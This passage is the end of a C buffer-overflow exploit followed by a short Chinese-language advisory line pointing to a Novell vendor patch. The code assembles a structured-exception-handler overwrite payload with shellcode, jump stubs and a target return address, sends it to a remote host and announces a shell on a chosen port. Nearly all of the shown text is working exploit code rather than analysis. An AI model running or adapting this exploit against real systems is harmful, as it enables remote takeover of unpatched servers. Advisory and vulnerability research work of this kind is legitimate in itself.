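    memset(buffer,0x41,68);      // First comes the ascii
    position = 68;
    memcpy(buffer+position,DEADRET,4);
    position = 680 - (strlen(shellcode) + 100);   // 680 : Pointer to next Exception structure
    memcpy(buffer+position,shellcode,strlen(shellcode));
    position += strlen(shellcode)+100;
    memcpy(buffer+position,jmpover,4); position += 4;
    /* Serialise the handler address explicitly as little-endian (the x86
     * target's byte order) instead of memcpy'ing part of an unsigned long,
     * which only happened to work on little-endian hosts. */
    handler = targets[targ].addr;
    buffer[position+0] = (char)( handler        & 0xff);
    buffer[position+1] = (char)((handler >>  8) & 0xff);
    buffer[position+2] = (char)((handler >> 16) & 0xff);
    buffer[position+3] = (char)((handler >> 24) & 0xff);
    position += 4;
    position += 8; // 8 bytes more nops
    memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
    position += 8; // 8 bytes more nops
    buffer[position] = '\0';     // End

    sprintf(request,attack,buffer);
    printf("[+] Connecting to remote host\n");
    s = remote_connect(argv[1],(unsigned short)atoi(argv[2]));
    sleep(1);
    printf("[+] Sending %zu bytes of painfull buffer\n",strlen(buffer));
    /* send() may write fewer bytes than requested on a stream socket; loop
     * until the whole request is out. */
    total = strlen(request);
    for (sent = 0; sent < total; ) {
        ssize_t n = send(s, request + sent, total - sent, 0);
        if (n <= 0) {
            printf("[X] Failed to send buffer\n");
            exit(1);
        }
        sent += (size_t)n;
    }
    printf("[+] Done - Wait for shell on port %s\n",argv[4]);
    close(s);
    free(buffer);
    free(request);
    return 0;
}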

建议:
厂商补丁:

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=3723994&sliceId=SAL_Public&dialogID=16776123&stateId=1%200%202648401
